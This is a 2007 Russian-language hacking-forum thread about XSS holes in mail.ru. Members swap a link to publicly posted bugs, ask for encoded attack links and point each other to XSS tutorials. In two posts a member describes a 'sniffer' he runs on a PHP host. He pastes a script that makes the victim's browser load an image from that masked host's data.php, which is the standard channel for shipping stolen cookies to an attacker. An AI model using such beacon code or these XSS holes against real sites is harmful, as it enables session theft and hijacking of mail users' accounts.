XSS на mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by je0n, 27 Jan 2007.

  1. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    Короче, это нашел не я. Уязвимости лежат в паблике уже долгое время. Обнаружил не я, а типуля, судя по сайту ему 16 лет. Короче респект и уважуха таким )) Надеюсь, если он выложил их в паблик, то ему их не жалко (засекаем время):
    http://usatikov.com/bugs.php
     
  2. OMOH_PA

    OMOH_PA New Member

    Joined:
    2 Jan 2007
    Messages:
    26
    Likes Received:
    3
    Reputations:
    10
    Чет не работает нифига. Походу уже поправили давно..
     
  3. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Не надо, прекрасно работает
     
  4. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Ещё бы. Он ведь пишет, что сначала "стучит" админам, а потом публикует.
     
  5. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    xss.netsec.ru чет отвалил...кто нить знает альтернативу...?=)
     
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    не вижу пользы в алертах, имхо, врятли кто будет ходить в кодированных сылках... лучше соц....
     
  7. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    Нлять пацаны дайте кто нить в закодированном виде...я сам это делаю с трудом ...докуя времени уйдет. А так бага вполне рабочая думаю.
     
  8. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    уже 8 часов прошло со времени создания поста, еще не закрыли )) Хотя выходные же ). Наверное еще и завтра работать будут )
     
  9. Ci5

    Ci5 Elder - Старейшина

    Joined:
    10 Oct 2006
    Messages:
    141
    Likes Received:
    100
    Reputations:
    -1
    Наверное нашел ту же самую багу, оповестил техподдержку и теперь бага, которая была найдена еще до него будет закрыта. :(
     
  10. Makes

    Makes New Member

    Joined:
    21 Nov 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    -3
    Создал сниффер на php хосте.
    Набираю в строке браузера http://****/data.php?1.
    В логах приходит "1". Все нормально.

    Создаю html страничку к кодом:

    <script type="text/javascript">
    img=new Image();
    img.src="http://****/data.php?1"
    </script>

    Загружаю ее в своем браузере. Ничего на сниффер не приходит. Почему?
     
  11. itiran

    itiran New Member

    Joined:
    29 Jan 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -3
    а конкретно кто то может создать видео для ламеров КАК ВСЁ ВЫШЕ НАПИСАНОЕ ИСПОЛЬЗОВАТЬ НА ПРАКТИКЕ

    а то извините тут все такие программисты и гуру, что ваши слова как "матюки" не опытному пользователю - не понятно :confused:
     
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    2itiran
    Почитай хотябы простенькие статьи по XSS, можешь начать с этого http://forum.antichat.ru/thread20140.html
    Потом найди более подробную статью, рекомендую статью Zadoxlik'a опубликованную в августовском Хакере.

    Без базового знание, и видео тебе вряд ли будет интересно и полезно
     
    #12 Constantine, 29 Jan 2007
    Last edited: 29 Jan 2007
  13. Makes

    Makes New Member

    Joined:
    21 Nov 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    -3
    Ну разве сложно ответить просто на вопрос? Я же не прошу сказать почему не работаеть такая то XSS. Я хочу узнать почему не выполняется такой скрипт:

    <script type="text/javascript">
    img=new Image();
    img.src="http://****/data.php?1"
    </script>
     
  14. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    в IE точно выполняется
     
  15. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    а можно ссылочку на эту "статью Zadoxlik'a" ?
     
  16. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    Ohhh usatikov very very old true hэcker.
     
    1 person likes this.
  17. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa&year=2006

    Восьмой номер. Сливай PDF арихив и читай
     
    2 people like this.
  18. INKOGNITO-SHADOW

    INKOGNITO-SHADOW New Member

    Joined:
    6 Jan 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    OTLICHNO!!!!!!!!!!!!